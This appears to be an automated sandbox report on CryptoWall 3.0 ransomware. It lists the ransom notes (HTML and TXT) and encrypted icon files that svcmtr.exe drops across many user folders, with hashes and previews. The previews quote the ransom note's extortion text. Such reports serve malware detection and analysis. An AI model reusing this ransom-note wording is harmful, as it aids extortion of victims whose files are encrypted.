                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Mozilla\updates\E7CF176E110C211B\updates\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Mozilla\updates\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Mozilla\updates\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Temp\Low\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Temp\Low\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Temp\WPDNSE\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Temp\WPDNSE\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Temp\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Temp\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\META-INF\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\META-INF\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\fonts\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\icon-16.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1614
                                                                                                                          Entropy (8bit):7.7076338004086065
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:c+9U40oDgQkL2d+AjKqNcOob5ihE102JJUUCNg:cztoD0ARhfskg
                                                                                                                          MD5:4C80FCA02EE9674BD9CBBBD7C261E5BB
                                                                                                                          SHA1:BEE5CC500BD1C41D2867CD2A8E05D02222CFD694
                                                                                                                          SHA-256:6AAB0DE0F72A66A64FEE3CC801820A94AC3F1CBE3847DA985A663D941DF8AF41
                                                                                                                          SHA-512:23C346AA9CF2A07024D8D27008AD0B170E58D8FAC5166FD6E0DAE538B4428086685320F11B5BEEF5E120C471A86DB88F49F8181F68347C3A6822D5F2DDE2C020
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....W ..-.......=.....Z..H.!m.|e....ONHv.d^......3...z/.X..(..X.8)J.3,....-lr..=S..8..;..}%.C<^xH..lDk......'....c...I.].-..Cc.q...e..B.1fspI.N.....8l9u....ht.{.LO.W......p....e.j...E.*.}t.+..^.S\...uMH.....WYFwHa.F.Z.W.....z 3t..]....M"i...|.W..Y..l.I&..kh...m...Bc...Y....=i.0.k...WxW}...T.um.p..].x>.I..t..,......+..f..Vj.......1.'[..v..4....,..\.~....da....8.%.p].Rf?hy...#.N......U%h...p.qm....\.4.t...WWv...E...?.9j/..Hy$...ec.y1.....o'.............$..bbC..<#.W^."P.C...C...u...q..7....~...Y.y.Yy.b...n.r...<.v..&/IV....a.s.Y...RP..F>.._ ...(..MJ....{K;s..;..0.mH....

                                                                                                                          C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\extensions\@all-aboard-v1-6\data\media\icons\icon-16_active.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1614
                                                                                                                          Entropy (8bit):7.690739959690895
                                                                                                                          Encrypted:false
